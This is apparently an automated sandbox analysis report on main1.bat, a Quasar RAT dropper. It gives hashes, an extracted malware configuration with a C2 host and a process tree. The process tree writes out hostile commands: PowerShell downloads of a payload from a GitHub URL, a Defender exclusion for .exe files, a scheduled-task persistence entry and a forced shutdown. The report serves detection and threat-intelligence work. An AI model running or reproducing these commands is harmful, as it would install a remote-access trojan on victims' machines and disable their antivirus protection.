Analysis

  • max time kernel
    49s
  • max time network
    50s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-11-2024 00:48

Errors

Reason
Machine shutdown

General

  • Target

    main1.bat

  • Size

    15KB

  • MD5

    837e6e693eab2459822a681dd8829347

  • SHA1

    77417d665e66ae2f962f52b3d7c916f0772f0615

  • SHA256

    57970a3c842bcaf6860a9d271b2725b08fc07a50ca18ff852983d8e80905a0c7

  • SHA512

    54f3d0f4a69d785dd6012f5376d131f3d4cdfa1885577c46468bf1e37aed1d7da86cc11b7efcddf53eede8a4803a16e14c008493404906e3b870ccd441278a48

  • SSDEEP

    384:wK1+KSlKC8kumFq/vM2pHz6YBM3P6QDSJO4ytvJ2/N2cGTuEhckk7VgFHbWvaPn0:wK1+KSlKC8++vM23b+CJXPn

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

bot

C2

wooting2000-47095.portmap.host:47095

Mutex

2e05f1ef-743b-4020-b18a-7f4276517e8b

Attributes
  • encryption_key

    E83D6FC31962786DAEA703F111D2381786DF06CA

  • install_name

    Modification1.5.14.12.exe

  • log_directory

    Logs

  • reconnect_delay

    3126

  • startup_key

    explorer.dll

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops file in System32 directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 15 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\main1.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:632
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/walks111551/09672018256120856125/main/installer.bat' -OutFile installer.bat"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3596
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K installer.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3900
      • C:\Windows\system32\cacls.exe
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        3⤵
          PID:2904
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Powershell -Command "Set-MpPreference -ExclusionExtension exe"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4532
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/walks111551/09672018256120856125/main/Modification11910275.exe' -OutFile Modification11910275.exe"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3016
        • C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe
          Modification11910275.exe
          3⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2512
          • C:\Windows\SYSTEM32\schtasks.exe
            "schtasks" /create /tn "explorer.dll" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Modification1.5.14.12.exe" /rl HIGHEST /f
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2620
          • C:\Windows\system32\SubDir\Modification1.5.14.12.exe
            "C:\Windows\system32\SubDir\Modification1.5.14.12.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in System32 directory
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4888
            • C:\Windows\SYSTEM32\schtasks.exe
              "schtasks" /create /tn "explorer.dll" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Modification1.5.14.12.exe" /rl HIGHEST /f
              5⤵
              • Scheduled Task/Job: Scheduled Task
              PID:4100
            • C:\Windows\System32\shutdown.exe
              "C:\Windows\System32\shutdown.exe" /s /t 0
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:4780
    • C:\Windows\system32\LogonUI.exe
      "LogonUI.exe" /flags:0x4 /state0:0xa38cc855 /state1:0x41c64e6d
      1⤵
      • Modifies data under HKEY_USERS
      • Suspicious use of SetWindowsHookEx
      PID:628

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      a5c074e56305e761d7cbc42993300e1c

      SHA1

      39b2e23ba5c56b4f332b3607df056d8df23555bf

      SHA256

      e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953

      SHA512

      c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      692a440f9cfbeaf648632aead685a5a1

      SHA1

      e4e4bd8405be77294f4be5ea18b5e05b139f35af

      SHA256

      3e1615e7774bd98860c984570515c293b64cf07f1b8e6688a72e78fa9ebed0f4

      SHA512

      c7501a0fc978d0f06f32c4a205246763796a20c0b2514f00cb6676c8c95ab38d463b87c2973ca2b9b3e2fee3bc7ded869f5896c498303397167c4b5f069db519

    • C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe

      Filesize

      3.1MB

      MD5

      fa9b1524e725c4a251d07007f15fa947

      SHA1

      5c023619d8180b611acb544fa1cd8bd31de9e61c

      SHA256

      0cbcab350f25f5764dc967cf6f764eccdd094b1f8ca14d60a731713ace6b1aec

      SHA512

      dac63f0970092186a909dafeb75cee3e1ad3b393984cf78a1d88e339a39ef235567f74b7a874b237762b8a46e74f8cb319add4bcbc4bdf8f76ec8e1476fb44db

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jde5g2wk.pyk.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\installer.bat

      Filesize

      996B

      MD5

      9573128d5eac791a88ae169d4941e267

      SHA1

      5bbcbca4753c6c2e145ac68712c3eb68eb1512f3

      SHA256

      1562ce54110ea27bad805f00f40e9bf78322dde78d4f900deee7e4cce17a70dd

      SHA512

      d2fd5846cebf28ee3b159f9743fa63d4bec31ccdb2a431305b8a80b8cbcbfddb50e9d29374d4bc381ac46a1e399fb703af5c38f83834949256d57968817e7522

    • memory/2512-49-0x00000000006C0000-0x00000000009E4000-memory.dmp

      Filesize

      3.1MB

    • memory/3596-11-0x00007FFC4F9C0000-0x00007FFC50481000-memory.dmp

      Filesize

      10.8MB

    • memory/3596-12-0x00007FFC4F9C0000-0x00007FFC50481000-memory.dmp

      Filesize

      10.8MB

    • memory/3596-16-0x00007FFC4F9C0000-0x00007FFC50481000-memory.dmp

      Filesize

      10.8MB

    • memory/3596-1-0x00000217EA980000-0x00000217EA9A2000-memory.dmp

      Filesize

      136KB

    • memory/3596-0-0x00007FFC4F9C3000-0x00007FFC4F9C5000-memory.dmp

      Filesize

      8KB

    • memory/4532-25-0x00007FFC4FD40000-0x00007FFC50801000-memory.dmp

      Filesize

      10.8MB

    • memory/4532-29-0x00007FFC4FD40000-0x00007FFC50801000-memory.dmp

      Filesize

      10.8MB

    • memory/4532-32-0x0000016DEEF70000-0x0000016DEF18C000-memory.dmp

      Filesize

      2.1MB

    • memory/4532-33-0x00007FFC4FD40000-0x00007FFC50801000-memory.dmp

      Filesize

      10.8MB

    • memory/4888-56-0x0000000003550000-0x00000000035A0000-memory.dmp

      Filesize

      320KB

    • memory/4888-57-0x000000001C8B0000-0x000000001C962000-memory.dmp

      Filesize

      712KB

    • memory/4888-60-0x000000001C0E0000-0x000000001C0F2000-memory.dmp

      Filesize

      72KB

    • memory/4888-61-0x000000001C270000-0x000000001C2AC000-memory.dmp

      Filesize

      240KB